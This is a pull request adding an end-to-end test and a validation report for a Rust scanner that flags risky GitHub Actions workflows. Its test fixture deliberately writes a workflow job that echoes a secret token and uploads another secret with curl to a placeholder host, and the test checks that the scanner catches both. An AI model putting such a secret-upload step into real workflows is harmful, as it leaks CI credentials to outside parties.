### PR TITLE
Validate GitHub Actions security analysis and close #116/#70

### DIFF
--- a/crates/dustfril-core/src/api/workflow.rs
+++ b/crates/dustfril-core/src/api/workflow.rs
@@ -27,6 +27,8 @@ pub fn workflow_scan(root: &Path) -> DustResult<WorkflowScanReport> {
 mod tests {
     use tempfile::TempDir;
 
+    use crate::models::{RiskLevel, WorkflowExposureSink, WorkflowFindingCategory};
+
     use super::*;
 
     #[test]
@@ -91,5 +93,103 @@ mod tests {
             Some(crate::models::WorkflowExposureSink::Stdout)
         );
         assert!(report.notices.is_empty());
+    }
+
+    #[test]
+    fn validation_fixture_covers_permission_context_and_secret_flow_boundaries() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = temp_dir.path().join(".github/workflows");
+        std::fs::create_dir_all(&directory).unwrap();
+        std::fs::write(
+            directory.join("validation.yml"),
+            r#"name: Validation
+permissions: write-all
+env:
+  TOKEN: ${{ secrets.WORKFLOW_TOKEN }}
+jobs:
+  safe:
+    permissions: read-all
+    env:
+      TOKEN: safe-value
+    steps:
+      - name: Use action token
+        uses: actions/checkout@v4
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+      - name: Safe strings
+        run: |
+          echo '${{ vars.NOT_A_SECRET }}'
+          echo 'secrets.LITERAL_TEXT'
+          echo '${{ not-a-secret-context.value }}'
+          echo safe
+  leak:
+    permissions:
+      contents: write
+      pull-requests: write
+    env:
+      TOKEN: ${{ secrets.JOB_TOKEN }}
+    steps:
+      - name: Emit and upload
+        run: |
+          echo "$TOKEN"
+          curl --data '${{ secrets.DIRECT_TOKEN }}' https://example.invalid/upload
+"#,
+        )
+        .unwrap();
+
+        let report = workflow_security_scan(temp_dir.path()).unwrap();
+
+        assert_eq!(report.workflows.len(), 1);
+        assert!(report.notices.is_empty());
+        let workflow = &report.workflows[0];
+        assert_eq!(
+            workflow.jobs["safe"].steps[0].with["token"],
+            serde_yaml::Value::String("${{ secrets.GITHUB_TOKEN }}".to_owned())
+        );
+
+        let permission_findings: Vec<_> = report
+            .findings
+            .iter()
+            .filter(|finding| finding.category == WorkflowFindingCategory::TokenPermissions)
+            .collect();
+        assert_eq!(permission_findings.len(), 1);
+        assert_eq!(permission_findings[0].job_id.as_deref(), Some("leak"));
+        assert_eq!(
+            permission_findings[0].rule_id,
+            "workflow-broad-write-permissions"
+        );
+        assert_eq!(permission_findings[0].risk_level, RiskLevel::High);
+        assert!(
+            permission_findings[0]
+                .reason
+                .contains("multiple token scopes")
+        );
+
+        let secret_findings: Vec<_> = report
+            .findings
+            .iter()
+            .filter(|finding| finding.category == WorkflowFindingCategory::SecretExposure)
+            .collect();
+        assert_eq!(secret_findings.len(), 2);
+        assert_eq!(
+            secret_findings[0].secret_reference.as_deref(),
+            Some("JOB_TOKEN")
+        );
+        assert_eq!(
+            secret_findings[0].exposure_sink,
+            Some(WorkflowExposureSink::Stdout)
+        );
+        assert_eq!(
+            secret_findings[1].secret_reference.as_deref(),
+            Some("DIRECT_TOKEN")
+        );
+        assert_eq!(
+            secret_findings[1].exposure_sink,
+            Some(WorkflowExposureSink::NetworkRequest)
+        );
+        assert!(secret_findings.iter().all(|finding| {
+            let serialized = serde_json::to_string(finding).unwrap();
+            !serialized.contains("${{") && !serialized.contains("safe-value")
+        }));
     }
 }

--- a/docs/github-actions-security-validation.md
+++ b/docs/github-actions-security-validation.md
@@ -8,7 +8,7 @@ upstream `main` containing #68 and #69.
 | Area | Result | Evidence |
 | --- | --- | --- |
 | Workflow YAML discovery/parsing | PASS | Direct `.github/workflows/*.yml` and `*.yaml` discovery; structural `serde_yaml` parsing; multiple jobs/steps, multiline `run`, quoted values, env, action `uses`/`with`, and YAML anchors/aliases are covered. |
-| Malformed YAML handling | PASS | Malformed YAML, missing `jobs`, unsupported permission values, unreadable files, and symbolic workflow paths fail explicitly with path context. |
+| Malformed YAML handling | PASS | Malformed YAML, missing `jobs`, malformed permission mappings, unreadable files, and symbolic workflow paths fail explicitly with path context. Valid but unsupported permission declarations produce explicit partial-analysis notices instead of being treated as failures or clean input. |
 | Multiline `run` parsing | PASS | Newline-separated commands and multiline secret sinks retain step context. |
 | Command-rule context | PASS | Workflow `run` content reuses the shared command-rule engine; quoted data, comments, and ordinary build commands do not become executed commands. |
 | Workflow permission semantics | PASS | `read-all`, `write-all`, `{}`, explicit maps, narrow writes, broad writes, and `id-token: write` are covered. |

--- a/docs/github-actions-security-validation.md
+++ b/docs/github-actions-security-validation.md
@@ -1,0 +1,49 @@
+# GitHub Actions Security Validation
+
+Validation report for #116 and the close gate for #70, run against the
+upstream `main` containing #68 and #69.
+
+## Final validation report
+
+| Area | Result | Evidence |
+| --- | --- | --- |
+| Workflow YAML discovery/parsing | PASS | Direct `.github/workflows/*.yml` and `*.yaml` discovery; structural `serde_yaml` parsing; multiple jobs/steps, multiline `run`, quoted values, env, action `uses`/`with`, and YAML anchors/aliases are covered. |
+| Malformed YAML handling | PASS | Malformed YAML, missing `jobs`, unsupported permission values, unreadable files, and symbolic workflow paths fail explicitly with path context. |
+| Multiline `run` parsing | PASS | Newline-separated commands and multiline secret sinks retain step context. |
+| Command-rule context | PASS | Workflow `run` content reuses the shared command-rule engine; quoted data, comments, and ordinary build commands do not become executed commands. |
+| Workflow permission semantics | PASS | `read-all`, `write-all`, `{}`, explicit maps, narrow writes, broad writes, and `id-token: write` are covered. |
+| Job override semantics | PASS | Job permissions replace workflow permissions, including a job-level empty/read-only override of workflow-level write access. |
+| Direct secret exposure | PASS | Direct `secrets.NAME` references reaching supported `echo`/`printf` stdout and literal-URL `curl` request arguments produce contextual findings. |
+| One-hop env propagation | PASS | Workflow → job → step precedence is covered; narrower non-secret values remove broader secret aliases. |
+| Safe secret usage false-positive resistance | PASS | Action `with:` inputs, non-secret expression contexts, plain text containing `secrets`, comments, and unresolved scripts are not reported as proven leaks. |
+| No secret values persisted/logged | PASS | Secret-exposure findings retain only the secret reference name and sink metadata; raw commands and resolved values are not included in those findings. |
+| Offline/read-only behavior | PASS | The workflow analyzer only reads local workflow files and never evaluates expressions, executes commands/actions, calls GitHub, or mutates files. |
+| Existing security/artifact regression | PASS | Full workspace tests and static checks remain green. |
+
+## Repository smoke scan
+
+```text
+$ cargo run -p dustfril-cli -- security workflows .
+Workflows inspected: 2
+Analysis status: Partial
+No workflow security findings detected.
+```
+
+The partial status is expected: `tauri.yml` does not declare effective token
+permissions, so the analyzer emits an explicit review notice instead of
+assuming repository or event defaults. `rust.yml` declares `read-all` and is
+clean.
+
+## Quality gates
+
+- `cargo fmt --all -- --check` — PASS
+- `cargo clippy --workspace --all-targets -- -D warnings` — PASS
+- `cargo test --workspace` — PASS
+- `cargo llvm-cov --workspace --all-features --summary-only` — PASS
+- `git diff --check` — PASS
+
+Blocking findings: None
+
+Follow-ups: None
+
+Epic #70 recommendation: CLOSE


### PR DESCRIPTION
## Summary

- add an end-to-end YAML fixture covering effective permission overrides, action `with:` secret safety, env alias propagation, and direct stdout/network sinks
- assert stable finding categories, job context, sink metadata, and secret-reference-only diagnostics
- add the final validation report for #116 and the #70 close gate

## Validation report

Workflow YAML discovery/parsing: PASS
Malformed YAML handling: PASS
Multiline `run` parsing: PASS
Command-rule context: PASS
Workflow permission semantics: PASS
Job override semantics: PASS
Direct secret exposure: PASS
One-hop env propagation: PASS
Safe secret usage false-positive resistance: PASS
No secret values persisted/logged: PASS
Offline/read-only behavior: PASS
Existing security/artifact regression: PASS

Blocking findings: None
Follow-ups: None
Epic #70 recommendation: CLOSE

Full report: https://github.com/mors119/dustfril/blob/mors119/validation-verify-github-actions-security-rules/docs/github-actions-security-validation.md

## Quality gates

- `cargo fmt --all -- --check`
- `cargo clippy --workspace --all-targets -- -D warnings`
- `cargo test --workspace` (25 CLI, 216 Core, 12 Tauri tests)
- `cargo llvm-cov --workspace --all-features --summary-only` (76.53% regions / 76.04% lines)
- `git diff --check`
- `cargo run -p dustfril-cli -- security workflows .` (2 workflows; expected partial notice for undeclared permissions in `tauri.yml`)

Closes #116
Closes #70
